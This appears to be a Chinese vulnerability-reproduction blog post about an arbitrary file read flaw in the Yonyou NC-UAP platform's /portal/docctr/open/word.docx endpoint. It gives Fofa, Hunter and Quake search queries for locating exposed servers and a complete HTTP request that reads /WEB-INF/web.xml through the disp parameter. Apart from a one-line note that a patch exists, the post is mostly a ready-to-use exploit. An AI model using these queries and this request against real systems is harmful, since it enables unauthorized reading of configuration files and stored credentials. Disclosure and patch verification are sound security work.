用友NC word.docx 任意文件读取漏洞复现

0x01 产品描述:

用友NC-UAP平台是用友UFIDA系列的核心组成部分,旨在为企业提供一个强大的业务应用和信息化基础架构。作为NC产品体系的基础,NCUAP支持构建和集成各类企业级应用,包括但不限于工作流、审批流、预警平台等,并且能够与其他第三方系统无缝对接
0x02 漏洞描述:

用友NC-UAP平台word.docx存在任意文件读取漏洞,攻击者可以通过漏洞读取服务器上的敏感文件,包括配置文件、保存的账号密码等敏感信息从而导致进一步攻击。
0x03 搜索语句:

Fofa:app="用友-UFIDA-NC" || body="/Client/Uclient/UClient.dmg"

Hunter:body="/Client/Uclient/UClient.dmg"

Quake:body="/Client/Uclient/UClient.dmg"


0x04 漏洞复现:

复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Host: your-ip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Cookie: JSESSIONID=722CE6F799BBDE1ED1AFA8DC032B06C0.ncServer; JSESSIONID=6BDD75C8E88EE19ED89FF84865C74059.ncServer
If-Modified-Since: Mon, 07 Jan 2019 01:42:44 GMT
If-None-Match: W/"15737-1546825364907"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
用户962377954481 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主2 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954484 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机5 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机5 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954485 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star5 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954485 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher6 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行9 天前
网络安全总结
安全·web安全